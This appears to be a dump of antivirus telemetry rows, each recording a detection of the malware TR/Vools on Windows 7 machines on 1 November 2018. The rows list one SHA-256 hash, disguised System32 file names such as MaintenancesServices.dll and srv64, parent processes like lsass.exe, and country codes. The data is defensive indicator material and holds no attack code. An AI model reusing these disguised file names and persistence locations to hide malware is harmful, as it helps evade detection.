  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:48:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:48:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:55:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:34:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:35:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:50:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:35:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:42:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:16:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:42:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080104-5bf0c8cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a301630a\\AVSCAN-20181101-080045-593A3C3A\\AVSCAN-20181101-080104-5BF0C8CF', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:01:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T09:14:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:11:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trz7900.tmp', filepath='\\?\\C:\\Windows\\System32\\trz7900.tmp', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:10:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:45:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095545-d47719bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b1a1b07\\AVSCAN-20181101-095509-CD66EFB1\\AVSCAN-20181101-095545-D47719BD', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:49:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:29:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-072424-1b63421a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d1bc712\\AVSCAN-20181101-072411-194848AD\\AVSCAN-20181101-072424-1B63421A', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:54:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T11:32:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:35:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:33:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:54:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:27:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T09:17:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:28:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T13:00:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:11:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:25:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:02:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:08:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:43:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T13:00:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:42:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:30:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:11:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:02:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:18:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:44:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:49:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:49:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T06:48:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:58:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:08:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:36:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:51:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:18:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:00:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T09:11:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:20:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:38:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T01:07:02Z'), dt=datetime.date(2018, 11, 1)),
